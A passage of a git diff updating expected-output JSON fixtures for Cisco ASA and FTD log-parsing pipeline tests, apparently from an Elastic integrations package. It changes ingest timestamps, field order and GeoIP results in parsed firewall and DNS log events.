0:00:30", "code": "305012", "kind": "event", @@ -16937,7 +16934,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16999,7 +16999,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604967600Z", + "ingested": "2021-12-14T14:37:05.575548294Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17083,7 +17083,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604971600Z", + "ingested": "2021-12-14T14:37:05.575548618Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17168,7 +17168,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604976100Z", + "ingested": "2021-12-14T14:37:05.575548956Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", @@ -17252,7 +17252,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604981200Z", + "ingested": "2021-12-14T14:37:05.575549287Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -17334,7 +17334,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604985700Z", + "ingested": "2021-12-14T14:37:05.575549622Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", @@ -17413,7 +17413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604989300Z", + "ingested": "2021-12-14T14:37:05.575550019Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", @@ -17438,22 +17438,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17463,12 +17457,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604993500Z", + "ingested": "2021-12-14T14:37:05.575550395Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", @@ -17482,25 +17479,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17510,12 +17504,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604999Z", + "ingested": "2021-12-14T14:37:05.575550726Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", @@ -17529,25 +17526,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17557,12 +17551,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605004500Z", + "ingested": "2021-12-14T14:37:05.575551063Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", @@ -17576,25 +17573,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17604,12 +17598,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605008100Z", + "ingested": "2021-12-14T14:37:05.575551408Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", @@ -17623,25 +17620,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17651,12 +17645,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605012300Z", + "ingested": "2021-12-14T14:37:05.575551739Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", @@ -17670,25 +17667,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17698,12 +17692,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605015800Z", + "ingested": "2021-12-14T14:37:05.575552079Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", @@ -17717,25 +17714,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17745,12 +17739,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605020400Z", + "ingested": "2021-12-14T14:37:05.575552485Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", @@ -17764,7 +17761,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -17828,7 +17828,7 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.605025600Z", + "ingested": "2021-12-14T14:37:05.575552824Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", @@ -17910,7 +17910,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605029800Z", + "ingested": "2021-12-14T14:37:05.575553158Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -17991,7 +17991,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605035300Z", + "ingested": "2021-12-14T14:37:05.575553498Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18072,7 +18072,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605040900Z", + "ingested": "2021-12-14T14:37:05.575554102Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18153,7 +18153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605046300Z", + "ingested": "2021-12-14T14:37:05.575554525Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", @@ -18232,7 +18232,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605052Z", + "ingested": "2021-12-14T14:37:05.575554860Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", @@ -18315,7 +18315,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605057400Z", + "ingested": "2021-12-14T14:37:05.575555194Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18396,7 +18396,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605062800Z", + "ingested": "2021-12-14T14:37:05.575555542Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18477,7 +18477,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605068300Z", + "ingested": "2021-12-14T14:37:05.575555868Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18558,7 +18558,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605073700Z", + "ingested": "2021-12-14T14:37:05.575556196Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18639,7 +18639,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605079100Z", + "ingested": "2021-12-14T14:37:05.575556591Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18720,7 +18720,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605084400Z", + "ingested": "2021-12-14T14:37:05.575556917Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18801,7 +18801,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605089800Z", + "ingested": "2021-12-14T14:37:05.575557249Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18882,7 +18882,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605095300Z", + "ingested": "2021-12-14T14:37:05.575557592Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18963,7 +18963,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605100800Z", + "ingested": "2021-12-14T14:37:05.575557928Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19044,7 +19044,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605106300Z", + "ingested": "2021-12-14T14:37:05.575558262Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19125,7 +19125,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605112300Z", + "ingested": "2021-12-14T14:37:05.575558736Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19206,7 +19206,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605116Z", + "ingested": "2021-12-14T14:37:05.575559063Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19287,7 +19287,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605120300Z", + "ingested": "2021-12-14T14:37:05.575559393Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19368,7 +19368,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605125200Z", + "ingested": "2021-12-14T14:37:05.575559735Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19449,7 +19449,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605129700Z", + "ingested": "2021-12-14T14:37:05.575560062Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19530,7 +19530,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605133300Z", + "ingested": "2021-12-14T14:37:05.575560400Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19611,7 +19611,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605137600Z", + "ingested": "2021-12-14T14:37:05.575560724Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19692,7 +19692,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605143100Z", + "ingested": "2021-12-14T14:37:05.575561056Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19773,7 +19773,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605148400Z", + "ingested": "2021-12-14T14:37:05.575561387Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19854,7 +19854,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605152Z", + "ingested": "2021-12-14T14:37:05.575561727Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19935,7 +19935,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605156200Z", + "ingested": "2021-12-14T14:37:05.575562052Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20016,7 +20016,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605159800Z", + "ingested": "2021-12-14T14:37:05.575562382Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20097,7 +20097,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605164400Z", + "ingested": "2021-12-14T14:37:05.575562718Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20178,7 +20178,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605169700Z", + "ingested": "2021-12-14T14:37:05.575563063Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20259,7 +20259,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605174Z", + "ingested": "2021-12-14T14:37:05.575563395Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20340,7 +20340,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605179400Z", + "ingested": "2021-12-14T14:37:05.575563717Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20421,7 +20421,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605184800Z", + "ingested": "2021-12-14T14:37:05.575564045Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20502,7 +20502,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605190100Z", + "ingested": "2021-12-14T14:37:05.575564367Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20583,7 +20583,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605195600Z", + "ingested": "2021-12-14T14:37:05.575564692Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20664,7 +20664,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605201Z", + "ingested": "2021-12-14T14:37:05.575565035Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20745,7 +20745,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605206400Z", + "ingested": "2021-12-14T14:37:05.575565371Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20826,7 +20826,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605211800Z", + "ingested": "2021-12-14T14:37:05.575565704Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20907,7 +20907,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605217200Z", + "ingested": "2021-12-14T14:37:05.575566036Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json index 67caf248680..1aca74a162a 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json @@ -4,37 +4,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 145, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -43,15 +37,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -90,7 +84,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096896200Z", + "ingested": "2021-12-14T14:37:39.593549919Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70", "code": "430003", "kind": "event", @@ -153,37 +147,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "AAAA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "AAAA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -192,15 +180,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -239,7 +227,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096900400Z", + "ingested": "2021-12-14T14:37:39.593551882Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -304,37 +292,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -343,15 +325,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { 